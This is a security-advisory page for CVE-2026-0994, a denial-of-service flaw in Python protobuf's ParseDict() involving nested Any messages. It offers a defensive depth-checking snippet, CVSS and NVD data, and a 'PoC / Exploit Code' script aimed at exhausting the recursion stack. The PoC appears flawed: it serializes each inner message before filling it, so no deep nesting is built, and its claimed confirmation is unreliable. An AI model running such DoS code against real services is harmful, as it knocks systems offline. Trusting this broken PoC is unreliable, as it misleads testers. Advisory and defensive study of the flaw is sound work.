Security Vulnerability Report
CVE-2026-0994 CVSS 7.5 HIGH

CVE-2026-0994

Published: 2026-01-23 15:16:07
Last Modified: 2026-04-09 14:19:18

Description

A denial-of-service (DoS) vulnerability exists in google.protobuf.json_format.ParseDict() in Python, where the max_recursion_depth limit can be bypassed when parsing nested google.protobuf.Any messages. Due to missing recursion depth accounting inside the internal Any-handling logic, an attacker can supply deeply nested Any structures that bypass the intended recursion limit, eventually exhausting Python’s recursion stack and causing a RecursionError.
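
One defensive measure that follows from the description above is to bound the nesting depth of the JSON object before it ever reaches ParseDict(), so the library's own recursion accounting is never the only line of defence. The guard below is an added example, not code from the CVE report or from the protobuf project; it walks the decoded JSON iteratively (so the guard itself cannot be exhausted by the input it inspects), and the limit value of 100 and the helper `nested_value_dict` are choices made for this example.

```python
# Added example (not from the report or the protobuf project): reject over-deep
# JSON objects before handing them to google.protobuf.json_format.ParseDict().
# The traversal is iterative on purpose: a recursive checker would hit the same
# RecursionError the description warns about.
from typing import Any as _Any


def json_depth(obj: _Any) -> int:
    """Return the deepest dict/list nesting level in obj (a scalar counts as 0)."""
    deepest = 0
    stack = [(obj, 0)]          # explicit stack instead of recursion
    while stack:
        node, depth = stack.pop()
        if isinstance(node, dict):
            deepest = max(deepest, depth + 1)
            stack.extend((v, depth + 1) for v in node.values())
        elif isinstance(node, list):
            deepest = max(deepest, depth + 1)
            stack.extend((v, depth + 1) for v in node)
    return deepest


def check_nesting(obj: _Any, max_depth: int = 100) -> _Any:
    """Return obj unchanged if its nesting is within max_depth, else raise ValueError.

    Call this on the output of json.loads() before ParseDict(obj, message);
    max_depth=100 is simply the limit chosen for this example.
    """
    depth = json_depth(obj)
    if depth > max_depth:
        raise ValueError(f"JSON nesting depth {depth} exceeds limit {max_depth}")
    return obj


def nested_value_dict(levels: int) -> dict:
    """Constructed sample input: `levels` dicts nested under the key 'value',
    the same shape a chain of Any messages takes once decoded from JSON."""
    node: dict = {}
    for _ in range(levels):
        node = {"value": node}
    return node


if __name__ == "__main__":
    check_nesting(nested_value_dict(10))          # accepted
    try:
        check_nesting(nested_value_dict(5000))    # rejected before ParseDict
    except ValueError as exc:
        print(exc)
```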

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:google:protobuf:*:*:*:*:*:*:*:* - VULNERABLE
google.protobuf < fixed version (the NVD record below lists versions up to and including 33.4 as affected)
All versions of the protobuf Python library (as of 2026-01-23)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
from google.protobuf.json_format import ParseDict
from google.protobuf import any_pb2


# Create deeply nested Any messages to trigger DoS
def create_nested_any(depth):
    """Create a deeply nested Any message structure"""
    inner = any_pb2.Any()
    inner.type_url = 'type.googleapis.com/google.protobuf.Any'
    current = inner
    for i in range(depth - 1):
        next_any = any_pb2.Any()
        next_any.type_url = 'type.googleapis.com/google.protobuf.Any'
        # Store the serialized inner Any as the payload of the current one
        current.value = next_any.SerializeToString()
        current = next_any
    return inner


# Test PoC for CVE-2026-0994
def test_cve_2026_0994():
    print("Testing CVE-2026-0994: DoS via nested Any messages")
    print("Creating deeply nested Any structure...")
    # Create nested structure with depth exceeding Python recursion limit
    nested_any = create_nested_any(1500)
    # Convert to dict format for ParseDict
    nested_dict = {
        'type_url': nested_any.type_url,
        'value': nested_any.value
    }
    print("Attempting to parse nested Any with depth 1500...")
    try:
        result = any_pb2.Any()
        ParseDict(nested_dict, result)
        print("Parsing completed without error (unexpected)")
    except RecursionError as e:
        print(f"RecursionError triggered as expected: {e}")
        print("Vulnerability confirmed: max_recursion_depth bypassed")
        return True
    except Exception as e:
        print(f"Other error occurred: {type(e).__name__}: {e}")
        return False


if __name__ == "__main__":
    test_cve_2026_0994()

References

https://github.com/protocolbuffers/protobuf/pull/25239 (Patch, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0994", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:06.840", "lastModified": "2026-04-09T14:19:17.700", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A denial-of-service (DoS) vulnerability exists in google.protobuf.json_format.ParseDict() in Python, where the max_recursion_depth limit can be bypassed when parsing nested google.protobuf.Any messages.\n\nDue to missing recursion depth accounting inside the internal Any-handling logic, an attacker can supply deeply nested Any structures that bypass the intended recursion limit, eventually exhausting Python’s recursion stack and causing a RecursionError."}, {"lang": "es", "value": "Hay una vulnerabilidad de denegación de servicio (DoS) en google.protobuf.json_format.ParseDict() en Python, donde el límite max_recursion_depth puede ser evitado al analizar mensajes anidados de google.protobuf.Any.\n\nDebido a que no se contabiliza la profundidad de recursión dentro de la lógica interna de manejo de Any, un atacante puede proporcionar estructuras Any profundamente anidadas que evitan el límite de recursión previsto, agotando finalmente la pila de recursión de Python y causando un RecursionError."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", 
"confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-674"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:protobuf:*:*:*:*:*:*:*:*", "versionEndIncluding": "33.4", "matchCriteriaId": "CF0F8C1C-5CDF-4758-864F-FFF2CBF7B00C"}]}]}], "references": [{"url": "https://github.com/protocolbuffers/protobuf/pull/25239", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}